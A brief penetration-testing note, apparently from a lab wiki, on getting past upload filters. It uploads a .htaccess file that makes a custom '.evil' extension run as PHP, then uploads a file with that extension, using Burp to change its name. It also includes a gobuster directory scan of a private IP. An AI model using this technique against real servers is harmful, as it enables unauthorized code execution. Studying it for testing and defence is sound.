.htaccess to allow extension

Add Type application/x-httpd-php .evil

# Check the extension type
cat .htaccess 

AddType application/x-httpd-php .evil

gobuster dir -u http://192.168.120.107 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Hit Ctr + h key to show dot extension for file upload.

Then you can upload the file.

Or, use a BURP to change the name and add the content to the request.

Rename the file to whatever you have defined in .htaccess and upload the file.

Last updated 2 years ago